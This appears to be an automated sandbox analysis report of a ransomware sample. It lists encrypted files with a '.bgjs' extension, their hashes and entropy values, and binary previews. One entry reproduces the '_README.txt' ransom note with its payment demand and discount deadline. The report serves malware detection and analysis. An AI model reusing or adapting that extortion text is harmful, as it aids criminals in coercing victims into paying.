                                                                                                                                      Preview:regf..3.$..=......}..R...!.....j...+....q/....f../...Sv..t.&%.D....d.g.t....&U...tO...G.%.cT.9....Ne...eq...~...F...F......S...|UPI.f.8E.......7....u.'..X._.m.t. .,;.l...2...,...7..;;....!.(T.S.G.....I..j.t#.F..2..7t).....*.k.X...J.h/e|6.Z_4!.[...........A.......x?fKYF*0..!8%....p..^....g..b..X.g..+....6m9.....3..PrD.B.....?...N.H&.....`.....{. . ....(r.v`._QC%...?X..K.l%.R...4..@....s]....|...~RW%.....T....=..k..xr"..Ii<z.>l...lI.C.7.Tmv..E.....h.T"..W.0dA1.u...7D..f.fb.<..<i....8..z@V.{mL1M.E.\K.a....I.?..(...]....&.N..P........^.).....#..G....S......mF..z....vE.k.p..$.A.....J..F..q.2...~viR..........K.8..e.jT.^..9...z&.$.r......N...-.>.U.r..O....;..w..H...%..O..6.v.'..........!......>...~\.O^I...C..!.R.|.P.VC_.s.....xL..f...~.P_I..*.XoM..0R.S....".xq..L1...|.j6.b........72....R.q...4....D.b..c...A.....B.qq..2..6y.l%....qA.ip:..u.........%d..XX....2R....e.......u^..^..ObBq.f.e.u...U<FAH..u..0-.....O.P.<.9...o/Y...D.M....'J.F

                                                                                                                                      C:\Users\user\Local Settings\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):65870
                                                                                                                                      Entropy (8bit):7.997158329420736
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:knjaluaYRduiavahVr9Uw3jK4YDWsxQgWhb1pRZ1EEa:kjPaY/uiav+p1YiLgI53rm
                                                                                                                                      MD5:863CF993E03F4971185FE786CB30A0C6
                                                                                                                                      SHA1:1A630E90F736EF086E05D86B56CA48E6A7D998BB
                                                                                                                                      SHA-256:F5731FB0B615149F02CDD26B18BA14A2E8F810A2FE8A4AF50F210F404CB534E9
                                                                                                                                      SHA-512:5F52BAB7558C682A786B16574F008741CF43E966D4F2B9DC051076A126655005E819651BD8AD2F1898FF61CFC36CF9509E44D7DC797EEC60DB2D1EA2A9A94ACE
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:.....c. 3....H....5.NKR.. .w.U..w..r.}..~.8%^..a..W....>..$..\...{.E...kO..HS.?D.2......X).o=!G.~...DTw l..l+....H.c_J...?....rH..91.'.<.7#CI0C).~^..W...`.`.H.8.o|R.s.1....u..L.O.$v...HM.m....[..PW..m.\..@..).~....L.^........ .KZ..H.<...ukc..IC.`.G....R...J.w0K..K NU.`:......P..f...X......%.....n.}..J......@....Z....q...2^5.....3...1.A'....O{..-...jt$.?XrJ>.|.A6.l... W.....;y+...lG..%C.....[f.P...E..n...K.d...Q_.q...M..._...../*.W{.sP.9..&..~..]?....4...BD0....&...}w...!...iZ=...`U+.a`.9.*+..<-R.uAZ.0...%...f.=.d....,):....].x._.2.J..]...=.[9..H/.j..i.H...;....e..)...........5Nj..w.!.S../.6......0..F...E9.I.2z._.R..,...b.p.:..mVm......?.kW...E1.@....!.C.Vz.N.B.....t...C.EZ.v...Xe....%....Rs...\..}..K..Sv2X.....PB<.IE....{A.........G%.iv|.....a.G.<Yr.F.&<a.........n9h.:qH.G.*8..P.dzq.^f.l-....yzh_`. ..VZ....V."....S.(.=%~..2.|Ou.. ."`#....s....U.+.#.7..>...$......s1.4`......< . ..,.-.U*.4O.....;09...z{j..g.R..6.....K?C'^...p.8.;..y.J.S.O...

                                                                                                                                      C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):30179
                                                                                                                                      Entropy (8bit):7.99440143287293
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:RxVFm4bIR6aWzMWM3PPaMdsOSg/QFV/klctUwzYxpOc1FHHR:RIVoaWz9M3PSlT11D2wExpOc15HR
                                                                                                                                      MD5:E698625CDE0BD07C83BDD0B9F59FAC5B
                                                                                                                                      SHA1:24F2A912CE258ED7BC5AF17FEE778B84E501D04C
                                                                                                                                      SHA-256:3B3EFCD4AAB4FB05B5ACCE9AEC30AE6B383C510ADD337BDFE4E48422AAEE0144
                                                                                                                                      SHA-512:CFAD21813B5034C4312225EA6E9E3B738C748738B1EA2B3C403C5EB994BB2061B94F57E68CDBC421C2214867458DEE07F4680BA2F3B62DED27A1976C8658B4C6
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:05-10.....!.$N...L...G.......YsPLM.bw..........1r..$.=|ue...Uf...m.QS.=g.&.._..'.X.).6..R`...&,......".Ud..bB~Jgp.F-u6z.'..N.../r..v./.>.K..@d.a.J....c.z......0..7.......v8h.....u'L..*..S~.....:.G..c...S.C.F.f.hZ.B..(.[.....U...U).aQ2B....fI2..`.....IytL.{!..E..i.69A...+....N.b..8.t..#..J.b4t...`....a...m;...D.........B.t}.&RM^..|..[..c..0...bt..%.V...O.tA6aF..fg......EW.31.g.../...Y....&#..p....4<..H....rTr.;M{.32..Tk.$."...6.}.........9..D.tA.C..4.G....L..5Q.....`........^.Yqo..a......... {...}.w...A..a........FH.65..df............6Z.R^Q..N=...=B.Y.S...96..q....E........c.jF.*....i.........\#R......v..0n...._....w..~KT...:K.g.X.S..tR(..._..k..q...=.~....e.L@..j......GG...`U....9>.a.(..c.@...aD..#..i.>T..Gq..0.O.(~.IK..q.-b.E...tS.4.PTlCk..3.a4EP..k..H..h6H.X7.)&....nHO.....bWiMI....2....k2l./ .=.R...8lF..q'%.ctT...n[.....%....Q...=1....d....d..`H..LXH.c......M.*{....N`..C$. .(.[A.g.f.Q.Ut....[T#...=.3....!.<..-...F..8.....P3Z...}...\.Z....

                                                                                                                                      C:\Users\user\Local Settings\Temp\scoped_dir10952_1826612563\f92dd30f-d70e-4c79-98e6-b827a8bb342f.tmp.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Google Chrome extension, version 2111655171
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):248865
                                                                                                                                      Entropy (8bit):7.9858479501352395
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:7h3szKlbIGxXNobLgXh3R07xRQyBVcaxlnfP:7hWKlkwXNxbOVnX
                                                                                                                                      MD5:A00C5395A97839FA9FAA59A624C974A5
                                                                                                                                      SHA1:944D4A32FEAAD10FE8A96CA7E41251D6A5F2952A
                                                                                                                                      SHA-256:C07F89A628FBEA476E3D85CC2C246A1BCD4AEE417093F7FCB7F542EB5871F257
                                                                                                                                      SHA-512:6C962E284F6DACCD09DD0EA4BC440E448F424FE1FFB48929977530DCE3144230032FAD3ED4B06554421530171D3896A294C5EB3D9434157DC2B7EAB65E67B738
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:Cr24.M.}]c...Bp.ct..za.jh$S.y.G..F............T....&.o..rD:k."}'.A...b0..\.%...A...T.......-_.h.^.[.D%.'?.......Mj3m.R..Pk86FT.]...3-.7.......<D...:..%...zj.e0*(..o.....kG...p...7.7!j.FXpFc.#.K..o<.&B.G.+r....7.....p..J%....owp....~7q#..q..v...U.....TP(>.R~.;0Oo!...\...#Y..f0..(.5.....A...?F.2....pD..B...R.T....u../pTY...A.......`g...;'....q#.p@.dO..zO....G...H...g2^65...A....B\..)...F....~.].Dk6.........D.."..W6$.p....AZD6.f..R.Gk..~.nG.7.(l..e?...j..d!'+Qe...'..G..mP*.jG<...d....5.K4m...sN..$.U)..'....f..O.._.|..pV.......IB........ .........G...1....qiw.^.....n.y.D....$%s.4..p...q>.E...$...0..N:.p..J...2.....o.4_...)...6!$i..T...X..)....K.Y.S/.......p0..AL..j8.f........p0.,6.t.M.Y.Q...).....Z6....7.@>..%....>...R..hN.n...*.D*.1..,..!w..R{2............P..'..$.E.ui.....L...%....z.......Zl..ns..,?....Z.F.n...^e.....Q4.Ri0..3.._s.E.HYN..n....>..}..?..5..........3.F<..s...ro..t...~...WyPJi ..x9..d.;.3.\Mn...-t5..i..q..Z...~=.s..M>.

                                                                                                                                      C:\Users\user\Local Settings\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:Google Chrome extension, version 2745333763
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1332939
                                                                                                                                      Entropy (8bit):7.991220897690401
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:24576:N6CiboyDhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLq:yD5L371GFrbBKiyGAo0EzatGaX
                                                                                                                                      MD5:6FCE39F4FFBB985EB4BDA63CBF3507DE
                                                                                                                                      SHA1:CCA23669B7A0AF02AE687A614CF165EC4655D690
                                                                                                                                      SHA-256:124DE31AA1F268B8CE227C019A23C0FE8F6329DB26B6A46C1185B843D00BB5D0
                                                                                                                                      SHA-512:86DE1B3DA9F59BA7CB4B1643F4F1115407F063371B4A291CA34F000D7022F55C058BD8512A3021FCB4BEDBB1D56B68B4791034573D324AAE59767ED73A6C2CD7
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:Cr24.x...E.g.Q....k.0.[..\C9t.$A......-0|....4H.+...w...'..[.....,..J......H...../...:. "..7.........C[4vN....J...f.....D.{.:.Z...?...0.u>o.c..'.+..._5..h...>..8.....X./.!=?t......K7..0h.ta..Bi..y_.;.wG:5..n....O.nb.l..A.{...%fR..<....Fc.Y.m..3n..J...X4.o....T7&.}.g&.Ff...z.9R~.T.....3...U../f^..~..w).9F..b6...C\zE.Eku.....I-...Wo~...#.Y..`...~.#%....#&c"*...".g.78%.&..x:..xz4..8.&....r..L...%....P..*..m.R.j.e..my...y.(.).;......0.W?..j.O._.......FfX1..zq.u..'.X.MO.A[#..{^+5IZ4.......};.<...z^..<G.96.....e.'....J...S..$...l.$n#.f....:J...j...#..>>z.....w.Z..I....%.e%.rz.S-....P..aT..................(1=.h5.f5. ...D.....?.Q......3$bF.7..G[..r.,......V.v...@..:\).]L..<....W...f.;..WU....F....)/..49w..f...Kf....3U...S.7.l..#;...x..$.......2e.0k2.fo6`M..N/.v.*...{....p...F0..s../...*@..... ....#...<..J...!).].....=..=A.X..O4'.C...3d.F1$...L.....\.s.YK.r8.M>_..PV.5..... ..U....oZ.;7./..:l.E.m2.x..:...]}..VR..g.Pb^o.f..........\p.........5...GfY...P

                                                                                                                                      C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1193
                                                                                                                                      Entropy (8bit):7.802436664884874
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BVtQyi6SGDKIQr0X0wr+P0g62xG9da8EUNujCT1tgySZBGE7DIxZ9dA7bD:BTQlRGDFQr0X0Az2Q9qjCxqRLnIxmD
                                                                                                                                      MD5:7309CD6789070E38DD495E4ABF9D21FC
                                                                                                                                      SHA1:A2E13EF68C24D9A0FBDCC6AF0084046F2849AA52
                                                                                                                                      SHA-256:6C2D261B65DF75DEAD213024FAD6C565D73C8E8B94DE014B93B60505DA789457
                                                                                                                                      SHA-512:2C2DEA4B0A645E6B43C046A9F54782A41CE2DB1A4BF8091BF7810E0368FC592A4D5E787E961660B8E649DB177DC6649734FB5AC42ACAB955ABDDD15FA8363F9D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.o~U.9...$.#.U..zX..3.+...@P......._..Ua\..sY^._.e..O.D...iy..%...fV..........<..?...Zvqn.H2%}.J..Y..j..............B..6%...f......N.D..5.b......>Wd....@#.j..SX...#Vj.....>.c.xk.h3...9...Y..\.nk]c!.%/.....M..N.8~.c\..O.....Ucs.}B...CC..!._..iA.8..'-..>mgzZoC.....Qu.X..0....5d~A.k..6..M..iI....]u..y......a/....[0.M....J....~.9H.3.6,......y+.....!.9....0.A.$.Y.cgA....K.).;Cs.!.T.....gP]...7....r....h.U.&.+=->.....4.."*1 d..?klRT.WS..i1j\..tb.v.w.../q.C_.-.H.M.+J.#.....J..XT...Ya....)=a2.b...0@..-...O....,.G.Y.0l....F.h.J..,"...Mmw.0...Q.a....<.:..h..D.Y.C..4.V.=...............O..p.y....9...'uj..We...a.C...Y..X.j..t.I....0...\.W.i8.mk$..kL..'@}?..>.Q.gn..M...7.b.C_.J..{.z.B.L....n.!.os..+!i>..I......Z..=.5i.-....V..."3.....J...j.t\W...Sy..5\$...[0Z(...............0d.4.....q...9..S...V.!,....;Z....E...a....p.s.N.8p.@Z'.......z..m.<..i..^&#.-<...c.mtev`.kB..t..H........*X2.`Yf#.D..y`.R....(..S.O.`Eug..z...".M.R .@.|.o....!..cl...*W.C)..R.W.K.

                                                                                                                                      C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1193
                                                                                                                                      Entropy (8bit):7.802436664884874
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:BVtQyi6SGDKIQr0X0wr+P0g62xG9da8EUNujCT1tgySZBGE7DIxZ9dA7bD:BTQlRGDFQr0X0Az2Q9qjCxqRLnIxmD
                                                                                                                                      MD5:7309CD6789070E38DD495E4ABF9D21FC
                                                                                                                                      SHA1:A2E13EF68C24D9A0FBDCC6AF0084046F2849AA52
                                                                                                                                      SHA-256:6C2D261B65DF75DEAD213024FAD6C565D73C8E8B94DE014B93B60505DA789457
                                                                                                                                      SHA-512:2C2DEA4B0A645E6B43C046A9F54782A41CE2DB1A4BF8091BF7810E0368FC592A4D5E787E961660B8E649DB177DC6649734FB5AC42ACAB955ABDDD15FA8363F9D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.o~U.9...$.#.U..zX..3.+...@P......._..Ua\..sY^._.e..O.D...iy..%...fV..........<..?...Zvqn.H2%}.J..Y..j..............B..6%...f......N.D..5.b......>Wd....@#.j..SX...#Vj.....>.c.xk.h3...9...Y..\.nk]c!.%/.....M..N.8~.c\..O.....Ucs.}B...CC..!._..iA.8..'-..>mgzZoC.....Qu.X..0....5d~A.k..6..M..iI....]u..y......a/....[0.M....J....~.9H.3.6,......y+.....!.9....0.A.$.Y.cgA....K.).;Cs.!.T.....gP]...7....r....h.U.&.+=->.....4.."*1 d..?klRT.WS..i1j\..tb.v.w.../q.C_.-.H.M.+J.#.....J..XT...Ya....)=a2.b...0@..-...O....,.G.Y.0l....F.h.J..,"...Mmw.0...Q.a....<.:..h..D.Y.C..4.V.=...............O..p.y....9...'uj..We...a.C...Y..X.j..t.I....0...\.W.i8.mk$..kL..'@}?..>.Q.gn..M...7.b.C_.J..{.z.B.L....n.!.os..+!i>..I......Z..=.5i.-....V..."3.....J...j.t\W...Sy..5\$...[0Z(...............0d.4.....q...9..S...V.!,....;Z....E...a....p.s.N.8p.@Z'.......z..m.<..i..^&#.-<...c.mtev`.kB..t..H........*X2.`Yf#.D..y`.R....(..S.O.`Eug..z...".M.R .@.|.o....!..cl...*W.C)..R.W.K.

                                                                                                                                      C:\Users\user\SendTo\Bluetooth File Transfer.LNK.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1383
                                                                                                                                      Entropy (8bit):7.851679443943104
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rEHDk7yq4UZDFmzrgydtWeT+0fsRz4oaHQLJWFsV8S/B9fAE9X11huHIOmbD:UqjZZmPtf9+w8zWHFsV8GLB11h+10D
                                                                                                                                      MD5:235F27C05B3CCA5AEC383786FD2CE4D1
                                                                                                                                      SHA1:8D1087157CDAACFA335220E4C37B68465D9EEBEA
                                                                                                                                      SHA-256:95A463627C68810E3E2D4B93240E1D847EF6295FE46369D51EB5D463649DBF0E
                                                                                                                                      SHA-512:CA4DD0EA41DC717DCCE318860BEAE5C46F3CE6667849F365BAAF528815F8226ED9CACEF1C045F11C09AD178F314A1150D8E9C0AEE1BB2B53514918BF3BBE6FE8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L....{%.v.^B......^.(..tc7.. .]...mi..)`..9.e(....G.u}.!t..e1...X ......*.$.5../.*k@Q+.X...J.9u....h..(.O.:...\..+.....z..dGpb.....oV..#..C....N=z...Q....X.`].q2=.Eu..".SZ.t...<#..G....@......s<E...}.4.1I.@.(..1.(...2..!.K...YI"Na...hpxu.g{1'....92.X._.....u.~].O.R...Ap.u..Kve3p..m.c...['.X....}.....1...F...A..e(.r....M...U..O...p..}.....L.|.'...6.'.)l|..>...T+xN.VeeF...nf...x...^?'..... .../.6._...?.@%.<..\.f...-U.u...f......T.G$B#.......B.?QZ7rG..r.j...c..~,.0....1.T......T.......m..x5.5...>....fP....R..L.?.=.!r.%.rB..L.. p.......0..@./O..b5.s..T.....6.$.k....-.'..+.>....Bmr..9..]....2mP$A[:..m......aHb...,...........4f.....W.W..Zk.=........FK.Q...M.a........q.{....H..m.~.Hf........j....)...}%.n~...?C.../0.W....V..fh.u.....N/D3B...z.!..2.*_...!.b.....m*.l!....R.{....W..+...~...%A.n..k.@..}.6.L......8[.Cv.M..1N*F..rl.1.*J.R:.b.^u#[l..S.U.....\.;K....o\*Q.tO.J...i..G1.)..H...0~.A..'...s.......>~ .K..fK...(8|^..RS.../...w.J?..r{....,.U.:....{....=.>R.

                                                                                                                                      C:\Users\user\SendTo\Desktop (create shortcut).DeskLink.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):341
                                                                                                                                      Entropy (8bit):7.316253728316204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:oN6lx32lefwkrBJn/7URA4nZ8mUpoezK9L8VozloOMmQrIXuG3ukIcii96Z:oqzRrBJ7U1nUWL5zJMDrI+mukIcii9a
                                                                                                                                      MD5:CB44211D6D112BE40070B682C7A78869
                                                                                                                                      SHA1:6B3F146760E55EBB01622F6024152542B00E9C3B
                                                                                                                                      SHA-256:8E8F3BC713B2B693415173D971813778715E4495D2E13E958DA31A59A05FF952
                                                                                                                                      SHA-512:49F8B828592E5468935B4DC4EAE8C69237B97B70BE9F87124D281489D91905C79B2EAE2991795B2C57EEEBA94F40D4B7A8361D51235B47877F9E2EDF8FF31932
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:deskt..%....Pk..%.tWK*.H....x^...8.?2..=.R.....^..$%.........9..8.<...x....V.Z.N.]...=.)..R^.......x. .`P..c2..l.........3..<kh.g/|t...^;...^P..I0.w#C.@B.....1..).G..K1...R...q...7.;~....(Y..7!6n.&.?.......%..\/[.y...n...4...{.,=.TUW..Qr^;.+......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\_README.txt

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1381
                                                                                                                                      Entropy (8bit):4.871279842231698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNzk5LmFRqrs6314kA+GT/kF5M2/kJw3P:WZHfv0pfNAU5WEYNzoLPs41rDGT0f/ko
                                                                                                                                      MD5:5C0D2AF2BAB961C34BE63223AFBBE8AE
                                                                                                                                      SHA1:FF8D0B48F001D5BDF4750B3FC165BB35901ABA39
                                                                                                                                      SHA-256:C20FC1B29B3E90E6FDD470F188EA5B1F9BE3ABE2DD7182A446104BEED5B0F765
                                                                                                                                      SHA-512:3868A57A61249B2FD243F7C526ED976F8D7730DD49970809BCCAA9FA686C533F9348C7240146F8F17BA7319F99C41D19165B5DE25A94976879122144BD450729
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/54cdfd152fe98eedb628a1f4ddb7076420240421150208/403a27..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49

                                                                                                                                      C:\Users\jones\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:PostScript document text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11214
                                                                                                                                      Entropy (8bit):7.983729900358035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:aAIqACCtYM5HVEowSQ7t38mSdqkCZnV7ci+NeQNJCIp2kXZS9YgkHHi4TylPR:kdCUDHISKt38mSGZVwfp1VXE+rql5
                                                                                                                                      MD5:B3374484EFDC753E90616EF2B78B81DB
                                                                                                                                      SHA1:93F21C0CA4383F25DCBF887B0340A59222FF77D9
                                                                                                                                      SHA-256:1D5721530113FC416946F68678F12B6A8C1F4BECBD70CDED1E5AE758E2E80DAF
                                                                                                                                      SHA-512:F6B7891689E7C383A3748E6A592CF51F43E155BDB5B13979F4CBB41CC99BA64290B21F52E8AA643EF495CFA310FF74940CFC2C42B8A9D1C7422B7C46AF48DD1F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:%!AdoVq.6.I...o.......H.......PU./...-........X,J..S.V...U`._Q...I....XTI...R.[.`"...d.../.k.'...=qt.P..I.<...a49..).....U...N.A.x"j..Q.*..c.%>.;*..._S.....0.......U.......^..J..VHG.?......w..=.+.P.Y...s.W{.....Zc(.o~.*B.@.o*U.Ibl.4.i...D.....m}..Z.8.^.P0l.O<..i....w{...#:.U..{..yQ..l.6.=.kS....F...l.=Me.i......#...2.....}..%4..:r)X{+.O..k2.B.:\./.:....9......r.j|\..1W..5....S>..J....A0...ER...W...L...n.......].R..u..S..?.....k..U...."....6..O.......j../I._.l...v.{..w...Q@'...|C.J2...k....D..wwa..:......=".]]......i....h.9..G..Uu.Y'...p.h.......j.y....X.9K#.z.?.y.g..m...'...(7....J ........*Br..0T.w......r....0..h..O(...<p.?R....6l..E/... .j.....sL.|.@n.C.....9...d.A.`kki.v~.D/....*.=.v...Z.Gv..Ra..J.Fs.$.~X...X!...X@,...F...d....i,d.'..t".&.......mA...b..8......D.S..G{..ypP....A.-........x....\l.G......F.z....l.....\....uHDI.A....U..#i..F.....G...6..}{.........N(....T}.qS.a....d..f..Bp...L.....`..tmj....+..}.p..GSo.b4..N/%..b}..,.z..=

                                                                                                                                      C:\Users\jones\AppData\Local\Adobe\Color\ACECache11.lst

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):932
                                                                                                                                      Entropy (8bit):7.767320392219112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:POGu9Ic70ym5ZqhqpWQMUYtZe3GTjvhSkHJaq46wRRNulp7wZhH4CMJjfWn9AazC:zu1LOWE387Aq4jAbI0JjO9AaWPbD
                                                                                                                                      MD5:A341067EC65545172949919F7B0292A7
                                                                                                                                      SHA1:FEA52DD8466DF2A3B9BC4D2AD404BEA18675B491
                                                                                                                                      SHA-256:36B071ED19F2412B11430F53A36635FB06988BF9BB98103381AF04A9A3DDB0F0
                                                                                                                                      SHA-512:7C3C5AAA1343820B9EC3677D7103E9102422343F64DD888A35C377078043444C38B7E30A91F5EFF3BE881A0F34C908F30299E7CEE09958C2A2DB6FFA957E5C25
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:CPSA....8;p....VT;.0c..J..o{....l......s......y..6`.. ...b...%\[..>un@.........e..x.SB..|...h(...Cz.y{r....w..>~.D.:..m|."......#....><..%.E......_.3.[..!.E!..`.,..j..$H...............nKRe........../.$.#.P.;....1..K.|j....Z...Z.4..z:-...S..DO..D.u...j.?b.....X..wd.uk...A.G./;.l..d.PD<...hC.9G<......i..R..z}._.;.4%.......{....[...?....s.<Q.G..{P.7dbH..X..c].A...%V.."..kR..A.U.h .%....."A6'r.z.Q*..]).`@.t...L...qT.u.....?.q..S.<...c...z..4..}Q.......U..Yd.z\Z....1.p.;........j.k&.~.NGK.if....Z.9C..Z&%o..V..(........~..$.+..42v.=.{...]-...':4L.F#C.V. &...dec.)I..........8]..W.8..A=..ei..D......y..kH~...d.z%@...b..s...mf...=..t...z..:/T...q.D.....[......j..5.4q_....R.ON.><.......J4t..k$.hIJ...#.....G/+.-f.O..^..>/%.z.K......1.2/.}:.6.NW.._....^P.....!.....=..F...qA.8............1......{.z..,VS.?... tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\USS.jcp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975416807113566
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:h9bH7w+0yypZtt99vxv5g6N8FhfzgJbwV+yOFriCkb/:h9bHE+St93RBIUJC+pr8b
                                                                                                                                      MD5:690EEFEB554F1BCEF7F3B34AFCE60F6C
                                                                                                                                      SHA1:D75F66302DC7526C2BAF915165E5FB16B30CBD34
                                                                                                                                      SHA-256:A75DC7DF868CF72069015800F194DEFFDE4AAC630702B8550A97B8C1CD83C721
                                                                                                                                      SHA-512:557F89C02B885315B5BE7BA8280F9DCE5A3923904783502E17BFB28F5ECF793C1DDC83B7AA945CBEDF09AFF3185FCA7B8DD850D7B2E23708DD7695A8A4243391
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.M.#.R../.J.Q.1...."1..^]H.[x.u..0{'c.p}..T|?Wt....&..bf..J..uE.........{.7+M.... .<._..A?...2y...osc.TX.A$Idll..._ ...-.%?s.>0..q...f.S.P...C..."...A.b-....."..,xt2U.$..x..z...K^...[.(U..x{..)./XU....*...7.d.*.h..}..v._.9....#......=N..y.;.......:.p.J....=.CM>.\..~B.@.U....e1C..u]xO#.4.....Q...._..F._D..#{Q,{.pUP.8..%...M.Y...%..W......J.9zp...=.y./..."k0.....SN..."..I.E.C...F=.....q...../<.1\...9GF....-..@........3..=p..j.=4@...NV]..p...{\-...*Y...aj.._.0.E.ixZO......-.7X...0. GY#k.*......r..|.....F..ZU.....u.OwXw....TP.j..Zhe..K.&..%.......W&d^ ..IFx............]..C..O.oQ;..K..>..0..../.0{..2G=.4..^l..i$.....:.UMT^W^;S..o...X...."M.......dJv.+".......7.....p...O.7....w..-....N...J{..z#.?....2..~..V...`..K.HJyn=.c..|7.4......|.....q*..=s..d.I.!..).......cn....$S...H"Dz....1e...S....%8..8...(e0E....vZ....R. Os..|.{....T..j..%oh....ro.~....,....o...S..+?...3v.....&s..A\..bd.S.....#..vU[.4...P._y..}9....4.....O....."............yFx.!.).7.?..=.....

                                                                                                                                      C:\Users\jones\AppData\Local\Comms\UnistoreDB\USS.jtx

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3146062
                                                                                                                                      Entropy (8bit):1.7310902822930134
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:mLwgT5xn0Gofq0o6Ys2O1e02fKvsF5v/aGKo3agO/qqv4RROYdVbtzFnrG5J5qhA:Yw85WLq8Ys1ifKEFpDKfCdYSa
                                                                                                                                      MD5:E38EA95D58D6547C15D2A762961FBCA9
                                                                                                                                      SHA1:27E14FB2040D3C36402425EBBDD95E1BC95D5051
                                                                                                                                      SHA-256:D81A46FFCB50BC5D92E28C0A9FA145C0D09243D9D2A8A4F48510628FBFF24E88
                                                                                                                                      SHA-512:A7A67541B43DF5429263971E65AC09FA1FAFD461EAD82EFAEBE0A4008F492631A2433E505ADA3E2C29B85AE3D68B8BBE7D608672BEDFDA3A64952A60D8640344
                                                                                                                                      Malicious:false
